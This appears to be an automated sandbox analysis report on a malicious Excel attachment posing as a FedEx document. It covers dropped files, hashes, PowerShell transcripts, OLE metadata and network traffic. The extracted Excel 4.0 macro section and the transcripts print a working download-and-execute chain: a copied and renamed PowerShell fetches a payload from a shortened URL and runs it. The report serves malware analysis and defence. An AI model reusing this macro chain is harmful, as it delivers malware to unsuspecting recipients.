                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoqj34sn.4ye.ps1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\powershell.exe
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):430592
                                                                                                                                                                                                                            Entropy (8bit):5.4944920581701515
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:kaEYqWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqOI:kJW2KXzJ4pdd3klnnWosPhnzq9
                                                                                                                                                                                                                            MD5:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            SHA1:F66A592D23067C6EFF15356F874E5B61EA4DF4B5
                                                                                                                                                                                                                            SHA-256:E0C662D10B852B23F2D8A240AFC82A72B099519FA71CDDF9D5D0F0BE08169B6E
                                                                                                                                                                                                                            SHA-512:E447F10E021EEF6C6629962B2EB2148F7073828F4CE2FC1C7FBAD67C300C38EBF022E960CE6BD4AC856A66958B02E00458589CFB5CF0CB87641F33B9FF349B81
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: docCGLRRT67L45F205V.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: docBRTNMR51L69G006Q.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03141330161.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_04198100168.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03675480267.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_02044200042.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_TMSRLL61M43B796B.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_BRNLSN65H44H501N.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03587420286.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03455910780.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_01555200441.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_07501560150.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_01578300210.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: sload.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: sload (2).vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_02298410644.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Fatt_cliente_02567110412.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: FattDiffEmessa2020 VNZMSM75H27B201Q.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: FattDiffEmessa2020 01170200339.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4..OU.OU.OU.Q.z.MU.F-z.EU. 1.KU. 1.TU.OU..U. 1.JU. 1.EU. 1.GU. 1..NU. 1.NU.RichOU.........................PE..L...N2..............................0.............@.................................; ....@...... ................................... ...}......................@....4..T...................x........................................................text............................... ..`.data...............................@....idata..............................@..@.rsrc....}... ...~..................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1099008FEDEX_090887766.xls.LNK
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Thu Nov 19 16:31:46 2020, atime=Thu Nov 19 16:31:46 2020, length=75776, window=hide
                                                                                                                                                                                                                            Category:dropped
Size (bytes):2230
Entropy (8bit):4.653149370351365
Encrypted:false
SSDEEP:24:8TqMPjgSFdeGAKWDbwDI77aB6myTqMPjgSFdeGAKWDbwDI77aB6m:8/j9eKWZiB6p/j9eKWZiB6
MD5:257A2CFEB1B38BBC1DB25FF8CD24DE08
SHA1:F4374A08219445E6BB7FEFD8E56522E4579F25F5
SHA-256:ADBE040933A4860F078E0B7CBCB889593CDB09B6D4233A1B051B98092D412809
SHA-512:7AB3E6704E4084ACDB945B5527D7CA6C092F935EE3190F62BE0255B2016B1F73C89D0478B9D2E685A2C82245FBF861AE4CDB5701A523BA062723BF57873A3ED2
Malicious:true
Preview: L..................F.... .......:...&2.....&2......(...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.sQ......S........................h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny.sQ......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....sQ. .109900~1.XLS..f......>QwxsQ.....h.....................6#..1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.......`...............-......._...........>.S......C:\Users\user\Desktop\1099008FEDEX_090887766.xls..1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Nov 19 16:31:46 2020, atime=Thu Nov 19 16:31:46 2020, length=8192, window=hide
Category:dropped
Size (bytes):904
Entropy (8bit):4.634674450896397
Encrypted:false
SSDEEP:12:8hBtCXUYcuElPCH2YgSFiYpGuruvA+WrjAZ/2bDkLLC5Lu4t2Y+xIBjKZm:8hLMjgSFnluSAZiDf87aB6m
MD5:24176C58F48FAA7E3A1037B8FFA6AC81
SHA1:51592224CA2CB4403FBFD7830849A46F02134DE2
SHA-256:524A8BFE7E1FBFA1A12BDBA4C1A3F6469264A851F11C2BB95FD93CA154863AE9
SHA-512:0AF14CD0469BA54CE179D46BAB642CC8B1FE56E81E0B784EDD34E67F75479D9CD16F4C668B9AFA0E0A94785FADD04DD48EF394F01838A0061316933E80E5C37F
Malicious:false
Preview: L..................F........N....-..P......&2...... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.sQ......S........................h.a.r.d.z.....~.1.....sQ....Desktop.h.......Ny.sQ.......Y..............>.......%.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):131
Entropy (8bit):4.463054770855908
Encrypted:false
SSDEEP:3:oyBVomMMRVGSjiLp2iVGSjiLp2mMMRVGSjiLp2v:dj6i0SjiL90SjiLmi0SjiL2
MD5:4B6A6073479788E47CDB2B9541380A2F
SHA1:5F4C24C163B47F613D1CF2110404D0385FE052A5
SHA-256:9D62BB83F98C890CA7832BDBA451BC0CB70592BF808C237D242BAD0C78A5B0D0
SHA-512:482944537A4B9D2F26079DD9E4B6CDDFFC70EAE1DD8AB15134BED8D591E457CC3D705E4932B15771CA686DDA5B424B4ED510819D736AEAE6F1A0948E486F1C44
Malicious:false
Preview: Desktop.LNK=0..[xls]..1099008FEDEX_090887766.xls.LNK=0..1099008FEDEX_090887766.xls.LNK=0..[xls]..1099008FEDEX_090887766.xls.LNK=0..

C:\Users\user\Desktop\61B10000
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:Applesoft BASIC program data, first line number 16
Category:dropped
Size (bytes):84328
Entropy (8bit):6.645197213312611
Encrypted:false
SSDEEP:1536:UXk3hbdlylKsgqopeJBWhZFGkE+cL2NdHmSb4wIE7zp0RhBv1hQz7rTr1+Xk3hbb:UXk3hbdlylKsgqopeJBWhZFGkE+cL2Nh
MD5:46039BBAC81FE8A1BFF4B381C0C786DE
SHA1:58F5D20336F1CE10EEB65D5013D3ED9E409CE5E2
SHA-256:A581FB978232CA6058F329C12ACB257BC057EBF9A3F7055C2E2AE1E6DCB82FFF
SHA-512:BA5904CE84626F73264A0248F02A867159CBF30B4AFA5C13E4DD75C3150113ABFF6DEFAF5BADE03247E5AD891E96A416C67AC57B0104760ABA45BAA3580853A1
Malicious:false
Preview: ........T8..........................\.p....pratesh B.....a.........=...........................................=...h...\:.#8.......X.@...........".......................1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.

C:\Users\user\Documents\20201119\PowerShell_transcript.367706.GhCrZJKN.20201119093157.txt
Process:C:\Users\user\AppData\Local\Temp\o.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1006
Entropy (8bit):5.083836944037601
Encrypted:false
SSDEEP:24:BxSAwxvBnJx2DOXJKGWqHjeTKKjX4CIym1ZJX7RnxSAZsvi:BZ0vhJoOZKBqqDYB1ZhlZZOi
MD5:CE59AFD079451DE08DDAD5E35524608F
SHA1:EBCE20B643E0715B34E77D44D9C9FD92132910A4
SHA-256:4E72B7C346016DB061C0827C1C14CB3373B47831223EF2A8BF25A39E9571C84F
SHA-512:90685286DA43ED84A048F7262C69ADDA07C4BE88A3C7A075F4CFB36119F8AB66FD58DDF4A5ABBA1A49BE89FAF36C30B72BF4DDDD1313917010E2CCC9DEE58C43
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119093217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item vc.exe -Destination $env:appdata..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119093217..**********************..PS>Start-Sleep 7; Move-Item vc.exe -Destination $env:appdata..**********************..Command start time: 20201119093253..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201119093255..******************

C:\Users\user\Documents\20201119\PowerShell_transcript.367706.MJQ4zjyk.20201119093157.txt
Process:C:\Users\user\AppData\Local\Temp\o.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1062
Entropy (8bit):5.264034064136681
Encrypted:false
SSDEEP:24:BxSAlxvBnJx2DOXJE3eWJHjeTKKjX4CIym1ZJX630nxSAZt:BZ3vhJoOZEZJqDYB1Z4yZZt
MD5:FEDB7E147DA31DEC575AA72B3F5E764A
SHA1:058A79F3FCCFB5FE04DA860228CFE60587387A76
SHA-256:FE36D4C1CDB475167B2B6A33D95272B3C23ABFB78FAFDC6943AD5A1244EA05D6
SHA-512:44680064BD9772A99AD65452B74E887F985B8A74C718EB5DC210E1BD68C3D1833975F40F44C1BAC3C7C9832FF847E4853E79FAEE17871DB9E52A78B3E9658890
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119093218..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')..Process ID: 6036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119093218..**********************..PS>(New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')..**********************..Command start time: 20201119093252..**********************..PS>$global:?..True..**********************..Windows PowerShell tran

C:\Users\user\Documents\20201119\PowerShell_transcript.367706.cMeZeq7v.20201119093201.txt
Process:C:\Users\user\AppData\Local\Temp\o.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):976
Entropy (8bit):5.078856042808288
Encrypted:false
SSDEEP:24:BxSA/xvBnJx2DOXJ1WwHjeTKKjX4CIym1ZJXOYnxSAZR:BZ5vhJoOZcwqDYB1ZZZZR
MD5:497DFCBBAB62DC2B128C53730CBFAA00
SHA1:794D4D7D8A68EDC09310B411C57FA31754B82157
SHA-256:EC6930783B823A6900FA7298A5B0975E3834773C204FD3A200699A5529CBE57B
SHA-512:9FE32BB7D50912DAE701641EEE1CDD17D115CD17FA488F0B0EE1DD7E505E56C4F8470F0A4153718053C845C424E8BC040E9B2157D73CCB1E7BCB6453D85D568A
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119093223..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;..Process ID: 1560..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119093224..**********************..PS>Start-Sleep 12; cd $env:appdata; ./vc.exe;..**********************..Command start time: 20201119093305..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201119093305..**********************..

C:\Users\user\Documents\vc.exe
Process:C:\Users\user\AppData\Local\Temp\o.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):160312
Entropy (8bit):7.6582344259708695
Encrypted:false
SSDEEP:3072:XYhVzakz10URbezAqQF2XcPmSsu/SmwhZ7jL/qz8/kLAQkR5K:iVVRbezcoXeT/wL7jLixzUK
MD5:BB7C0DFD8ECC7EEBCE937A232608695F
SHA1:1CCC1FB00E7550C3E0A531E2C0516B741BD26F77
SHA-256:BE901CFEF8FFF5E7E61DEBEB870EB86D93E84CD458E34D661BC7B0C1103D93BF
SHA-512:DF6F2AAB574B766CD9AC6FEA092DF79E667B731C8C4CAC34127294C7EBD50CCC9E66F0ECDDBEA0B5BC9A4BCD1999035484C8A30259948AE08BC76B9BB2B23EC3
Malicious:true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.._.................H...........f... ........@.. ....................................@..................................f..J....................T..8............................................................ ............... ..H............text....F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H...........T>......@....+...:..........................................N+.+.*(....+.(....+.6.(.....(....*..>+.+.*.+.(....+..0..]........,*+)+*.,..,+&++,. .f.+%+*.-.+,&.,.+-{....+)*.+.(....+..+..+.(U...+.(....+.(....+..+.o....+.....0..v........-.+:.+>,. ..f.+<+A&.-.*+A+B .f.+B .....+A+B.o....}.....-..-.*(....+.(....+.(U...+.(....+..+.(....+.(U...+..+.(....+....0..I........-.+',.+&{....,.+ {....+..,..,.+.+..,.&&.-.*.+..+..+.o....+..+..+.(....+.....~....*..+......*.+...(....*

\Device\ConDrv
Process:C:\Windows\SysWOW64\Robocopy.exe
File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                            Entropy (8bit):5.024065535765779
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:ohpj8WXp+N23fInNq2JS2KFfFjdpp5TpjInn:oTjlAn5KFf/bTjInn
                                                                                                                                                                                                                            MD5:FB1FEB60AF5F4BAEEF6DE01B2C04447E
                                                                                                                                                                                                                            SHA1:D8DBF120E2871F1661A7BA3F591C2E85724BC010
                                                                                                                                                                                                                            SHA-256:7D7DBAFF7CE525336918841033AB6E6F9C5B1DAA04620377ECEE5A7488C83D90
                                                                                                                                                                                                                            SHA-512:F636F9B05B6B209AE567680FCDD6628C2CC747C93BBBBBA2E405CAE7B8D7EEFDDB7A5B1D68B611EA7267FB8904861B17E356F640A95BDF6D39B78986A1D6F45B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: C:\Windows\system32\WindowsPowerShell\v1.0\C:\Users\user\AppData\Local\Temp\powershell.exe/DCOPY:DA /COPY:DAT /Z /MT:8 /R:1000000 /W:30 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Oct 11 00:50:35 2020, Security: 1
Entropy (8bit): 6.7883643858765215
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: 1099008FEDEX_090887766.xls
File size: 68608
MD5: 069451376c805d4b4d21fdc34a5e58ba
SHA1: 5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256: dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
SHA512: b05d54fb806cfa391e78871328659319824481dcf522a8a1a18067c6c702460fb8650dd603f8d91e1123ef9836406c2fdddc48f38048c8ca1da6a77983f750ec
SSDEEP: 1536:eknSGiysRchNXHfA1MiWhZFGkEld+Dr7e7mSb4wIE7zp0RhBv1hQz7rT01R:eknSGiysRchNXHfA1MiWhZFGkEld+Drj
File Content Preview: ........................;......................................................................................................................................................................................................................................

File Icon

Icon Hash: 74ecd4c6c3c6c4d8

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "1099008FEDEX_090887766.xls"

Indicators

Has Summary Info: True
Application Name: unknown
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1252
Last Saved By: Alexis UZAN
Create Time: 2020-09-20 21:17:44
Last Saved Time: 2020-10-10 23:50:35
Security: 1

Document Summary

Document Code Page: 1252
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 276
Entropy: 3.16930549839
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
Data Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 156
Entropy: 3.42617386685
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . A l e x i s U Z A N . @ . . . . L . z . . . . @ . . . . . . % ` . . . . . . . . . . .
Data Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0c 00 00 00 41 6c 65 78 69 73 20 55 5a 41 4e 00 40 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65416
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 65416
Entropy: 6.88571621138
Base64 Encoded: True
Data ASCII: . . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P - P C s U Z A N B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . h . . . \\ : . # 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw: 09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 2d 50 43 73 20 55 5a 41 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

The extracted Excel 4.0 macro cells, one formula per line (quoting as exported by the sandbox):

"=EXEC(""cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit"")"
"=EXEC(""cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit"")"
"=EXEC(""cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'"")"
"=WAIT(NOW()+""00:00:03"")"
"=EXEC(""cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')"")"
"=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item """"vc.exe"""" -Destination """"$env:appdata"""""")"
"=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;"")"
=PAUSE()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 19, 2020 09:32:52.715012074 CET  49733        443        192.168.2.3     104.20.138.65
Nov 19, 2020 09:32:52.734790087 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.734889030 CET  49733        443        192.168.2.3     104.20.138.65
Nov 19, 2020 09:32:52.814364910 CET  49733        443        192.168.2.3     104.20.138.65
Nov 19, 2020 09:32:52.831073999 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.833165884 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.833189011 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.833199024 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.833246946 CET  49733        443        192.168.2.3     104.20.138.65
Nov 19, 2020 09:32:52.838095903 CET  49733        443        192.168.2.3     104.20.138.65
Nov 19, 2020 09:32:52.854613066 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.854893923 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:52.906893969 CET  49733        443        192.168.2.3     104.20.138.65
Nov 19, 2020 09:32:52.923342943 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:53.401897907 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:53.401942015 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:53.401971102 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:53.402004957 CET  443          49733      104.20.138.65   192.168.2.3
Nov 19, 2020 09:32:53.402069092 CET  49733        443        192.168.2.3     104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.402123928 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.459614038 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.471981049 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.472218990 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.474103928 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.486398935 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.491949081 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492048979 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492182016 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492491961 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492600918 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492669106 CET49734443192.168.2.3162.159.129.233
